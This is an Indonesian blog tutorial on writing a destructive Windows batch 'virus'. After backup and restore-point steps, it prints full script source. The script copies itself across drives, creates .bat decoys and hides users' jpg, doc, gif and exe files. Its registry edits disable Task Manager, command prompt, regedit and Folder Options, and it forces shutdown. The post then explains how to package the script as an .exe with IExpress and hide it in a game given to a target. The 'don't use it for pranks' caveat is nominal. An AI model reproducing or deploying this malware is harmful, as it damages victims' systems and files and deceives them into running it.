dalam OS windows kita sering mengenal yang namanya cmd (command prompt) sebuah program yang bersifat Under Dos yang bekerja langsung kedalam registry komputer dan perlu kita ketahui semua kerja system pada Windows di kendalikan oleh registry , jadi kalau kita ingin mengubah system dalam komputer maka kita harus tahu dulu akses ke dalam registry.
Ternyata dengan menggunakan fasilitas Notpad yang di dalamnya ada syntax tertentu yang kemudian di simpan dengan file berekstensi .*bat, mampu menciptakan virus yang cukup berkesan.
Dalam memulai proyek ini sebaiknya kita backup terlebih dahulu registry komputer kita kedalam media penyimpanan eksternal seperti CD, DVD,Flashdisk dll.,agar ketika kita melakukan kesalahan kita bisa mengemablikan registry pada keadaan semula .
Untuk lebih jelasnya perhatikan langkah-langkah di bawah ini:
Buka jendela Run melalui start-Run , Lalu ketik kata regedit pada kotak Open kemudian Klik OK untuk membuka Registri Editor
· Klik File-Export
· Setelah muncul kotak dialog Export registri file ,ketikan nama file yang akan anda gunakan di kotak file name .
· Pada kotak combo Save as type ,pilih Registration Files(*.reg),
· Untuk menyimpan semua pengaturan registry pilih Opsi All pada radio button Export range .
· Kalau udah klik save.
Jika terjadi kesalahan maka kita tinggal mengimport registry yang telah kita simpan tersebut caranya masuk kedalam registri seperti kita waktu membackup registry dengan catatan bahwa kita masih bisa mengakses regedit tempat registry …nah yang jadi masalah virus yang akan kita buat ini adalah virus yang akan mampu menghilangkan akses user kedalam Task manager, command prompt , folder option dan regedit , karena kalau kita biarkan fasilitas ini bisa di akses oleh user maka sia-sialah virus yang kita buat……..
Karena fasilitas tersebut mampu membunuh file tempat virus yang bernaung …..
Jadi gimana dong supaya komputer kita tetap aman …”?,koq jadi kaya buah simalakama dimakan salah enggak dimakan juga salah;”
Tenang jangan panic dulu saya akan kasih tahu caranya yaitu menggunakan fasilitas restore point (mengembalikan konfigurasi windows ke kondisi semula) coba perhatikan langkah-langkah berikut :
· Klik start program- accessories – system tools – system restore.
· Setelah muncul dialog system restore ,pilih create restore point ,kemudian klik next untuk melanjutkanya .
· Isikan nama restore point yang akan kita gunakan pada restore point description misalnya kita menggunakan nama ”kondisi bagus nech”.
· Klik create ,selanjunya akan muncul jendela restore point created ,yang memberikan inforamsi bahwa retore point baru telah berhasil di bentuk dengan menampilakn tanggal dan waktu pembuatannya ,serta nama restore point yang akan kita gunakan .
· Klik close untuk menutup kotak dialog sytem restore point .
Tadi baru aja kita simpan restore point terus giamana caranya untuk memanggil restore point tersebut untuk itu ikuti langkah-langkah berikut:
· Kilik –start Program –accsesories –sytem tools sytem restore point .
· Stealah muncul kotak dialog sytem restore ,pilih my Komputer to an earlier time kemudian klik next untuk melanjutkanya .
· Tentukan tanggal yang akan kita guankan untuk mengembalikan kondisi komputer kita .tanggal terebut merupakan tanggal dimana anda pernah membuat restore point dan kali ini kita kan memanggil restore point pada tanggal tersebut .tanggal yang akatif akan tercetak lebih tebal dari tanggal yang lain , klik next untuk melanjutkannya
· Selanjutnya akan muncul kotak dialkog confirm restore point selection ,yang memberikan berbagai macam informasi klik next untuk melanjutkannya .
· Selanjutnya komputer akan melakukan restart .setelah proses selesai akan muncul kotak dialog yang menyatakan restoration complete .
Kira kira seperti itulah pencegahanya nah kalau udah selesai dengan semua persiapan maka kita mulai aja proyek virusnya.
Yang perlu kita lakukan kita buka dulu notpad melalui start-allprogram –accessories-notpad atau melalui menu run ktikan notpad lalu klik OK.
Kalau udah coba ketikan scriptnya seperti di bawah ini:
Echo off
Cls
Echo Halooo……semua
Pause
kalau udah coba simpan dengan nama proyek1.bat pada dropdown save type pilih All files, lalu klik save ,untuk mudahnya lihat gambar berikut :
Sekarang coba jalankan file yang telah kita simpan misal di drive E: kemudian cari file dengan nama proyek1.bat, setelah ketemu doble klik pda file tersebut dan inilah hasilnya:
Nah kenapa bisa begitu alasannya :
· Pertama kita menggunkan perintah echo off yang fungsinya untuk menampilkan pesan ,
· Cls sendiri berfungsi untuk membersihkan layar pada saat pesan tersebut di tampilkan ,
· Pause perintah yang berfungsi untuk menghentikan proses program sementara waktu ,dan akan kembali menjalankan perintah ketika kita menekan sembarang key pada board”Makanya muncul kalimat “Press any key to continue”.
Sebenarnya banyak sekali perintah –perintah yang bisa dilakukan dalam under dos windows baik eksternal maupun internal untuk lebih jelasnya silakan cari sendiri refrensinya….he…he….
Contoh diatas hanya sedikit dari kehebatan notpad dan file batch(*.bat ).]
Saya akan kasih langsung script virus yang pernah saya buat tapi ingat jangan di pake jahil ya…..
Coba ketik Script berikut ini ! :
Echo off
If no exist c:\windows\%0copy0% c:\windows
For %%p in(A C D E F) do copy%0 %%p:
For %%q in (*.jpg *.doc *.gif *.exe) do type %0>%%q.bat
For %%r in (*.jpg *.doc *.gif *.exe) do attrib +h +s %%r
REG ADD HKCU\Software\Microsoft\Windows\currentVersion\
Explorer\advance/v ShowSuperHiden /t REG_DWORD/d 0/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/vNoFolderOption /t REG_DWORD/d 1/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\System/vDisableTaskMgr /t REG_DWORD/d 1/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/vNoFind /t REG_DWORD/d 1/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/ vNoRun /t REG_DWORD/d 1/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/v aktifkan /t REG_SZ/d C:\Windows\proyek1.bat
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\Explorer/vNoViewOnDrive /t REG_DWORD/d 4/f
REG ADD HKCU\Software\policies\Microsoft\Windows\System/v DIsableCMD /t REG_DWORD/d 2/f
REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\
policies\System/DisableRegistryTools /t REG_DWORD/d 1/f
Shutdown –sd –t 60 –c “Tak ada pertahanan yang sempurna di muka bumi ini by:Jombi_par_hackers”-f
Exit
Nah gimana kira-kira pusing enggak lihat script yang lumayan runyem?…….,jangan di pikir runyemnya tapi lihat khasiatnya…he…he..,(Obat kali…)
Kalau udah diketik simpan aja filenya dengan nama proyek2.bat kalau enggak mau buat file baru buka aja file proyek1.bat yang udah kita buat caranya gampang koq cari file itu terus klik kanan pilih menu Edit kayak yang di gambar ini nih..
gampang kan?, ya iyalah gampang.
Sekarang saya mau jelasin sedikit soal script diatas soalnya ada yang nanya apa sih maksud script itu? Ini di jawabannya:
· If no exist c:\windows\%0copy0% c:\windows ;script ini artinya virus akan memeriksa apakah dirinya telah berada di direktori C:\Windows ataukah belum ,jika belum maka virus akan mengcopykan dirinya kedalam direktori tersebut . 0% di gunakan buat menghandle nama file dari dirinya.
· For %%p in(A C D E F) do copy%0 %%p: maksud dari perintah ini file virus akan mengcopykan kedalam direktori A ,C, D, F, .%% character ini menunjukkan perintah perulangan sebanyak p dan q sedangkan 0% digunakan untuk menghandle file virus .
· For %%q in (*.jpg *.doc *.gif *.exe) do type %0>%%q.bat,perintah ini akan menciptakan file *.bat yang baru dengan ekstensi *jpg, *.exe *.doc , sesuai dengan yang di sebutkan jika ada sebuah file *.doc Misal: riset.doc maka menjadi riset.doc.bat.
· For %%r in (*.jpg *.doc *.gif *.exe) do attrib +h +s %%r,nah kalau yang ini baru namanya virus he..he….. kenapa begitu ?”, karena script ini akan mengecek semua file berexstensi (*.jpg *.doc *.gif *.exe) yang kemudian menghidden atau menyembuyikan file tersebut .dengan mode super hidden makanya ada +h +s .+h menghidden file kemudian akan di simpan dalam mode super hidden dengan perintah +s
· Kemudian perintah REG_ADD……maksudnya akan memasukan nilai string maupun bolean kedalam registri yang tentunya nilai-nilai /d 0/f, /d 1/f, /d 4/f tresebut memiliki fungsi tersendiri untuk lebih jelasnya cari aja sendiri..referensinya…..ya …
· Shutdown –s –t 60 –c “Tak ada pertahanan yang sempurna di muka bumi ini by:Jombi_par_hackers”-f
Perintah ini akan menampilkan pesan seperti yang tertulis pada script “Tak ada….”kemudian akan memaksa komputer shutdown dalam hitungan mundur yaitu selama 60 detik makanya ada script –t 60(catatan nilai 60 bisa diganti sesuai keinginan kita misal:15 )biar cepat mati tuch komputernya…he…..-s adalah perintah shutdown nah kalau -f setelah hitungan mudur 60 detik maka komputer akan di paksa untuk shutdownt……ih ngeri banget ya……..
Sekarang udah selesai nih sebenarnya udah sih Cuma kurang afdol kalau filenya masih ada kata-kata kaya yang ditunjukan gambar yang ini :
Kalau mau nyebarin virus enggak jauh beda kalau kita lagi promosi sesuatu gimana caranya bungkus product kita menarik bagi konsumennya ,so banyak yang beli dech , nah kalau gitu gimana kalau file virus ini kita ubah menjadi file berekstensi *.Exe, kemudian kita sisipkan kedalam aplikasi game atau aplikasi yang lain sehinggga file ini akan menjadi program aplikasi seperti contoh berikut :
Lihat pada copy proyek 1 urutan tiga gimana kerenkan enggak ada lagi yang namanya MS-Dos batch File yang kesannya jaoel banget……he…he….
Terus gimana caranya untuk buat exstensi *.Exe,ikuti langkah-langkah berikut:
* Klik kanan pada Start –pilih explorer –pada document setting(drive C)-cari foder Windows.
Stelah itu –cari system32-kemudian klik IExpress lihat gbr berikut:
Kira-kira kaya begitu dech….
* Klik aja next-kalau keluar Box Package Purpose-Pilih Extract files and run and installation command-klik next.
* Pada box packageTitle-ketikan nama file yang baru - kalau udah pilih Next.
* Pada confirmation prompt-pilih no prompt-klik Next.
* Pada box license agreement-klik Don’t display a license-klik Next.
* Pada box package Files –pilih tab Add, disini kita disuruh mencari file yang akan kita ubah atau di Exstrack ( proyek1.bat)
* Kalau udah klik Next aja,kalau muncul box seperti gambar berikut : and disuruh memasukan kata-kata sebelum program ini diinstal nantinya semacam kotak konfirmasi gitu dech…buat ajalah terserah anda kalau udah di Next lagi :
# Pada box finished massage pilihg aja No massage –klik Next, kalau muncul box baru dengan pesan Package name And Option “ ,perintah ini memerintahkan kita untuk membuat folder untuk menyimpan hasil exstracksi file proyek 1.bat tersebut.
# Stelah itu akan muncul box create package –klik aja Next dan tunggu beberapa saat untuk melakukan exstraksi file sampai keluar Box yang memeberi pesan kalau proses extrasi telah selesai –terus klik Next :
file itu berubah menjadi dua File yang satu berexstensi *.Exe, dan yang satu berexstensi .*Txt ,kalau udah gini berarti kita udah siap menyebar virussebenernya cara ini bukanlah satu-satunya cara untuk mengexstarck tapi masih ada yang lebih sederhana sebenarnya saya pengen ngasih tahu Cuma kalau saya kasih tahu terus entar jadi manja lagi ..,udah enggak usah dipikirin,
Sekarang tugas kita tinggal nyimpan folder tersebut kedalam folder yang brehubungan dengan program aplikasi yang paling di gemari misalnya kita simpan dalam direktori game kemudian kasih dech ke gamenya ke orang yang dituju.
0 comments:
Post a Comment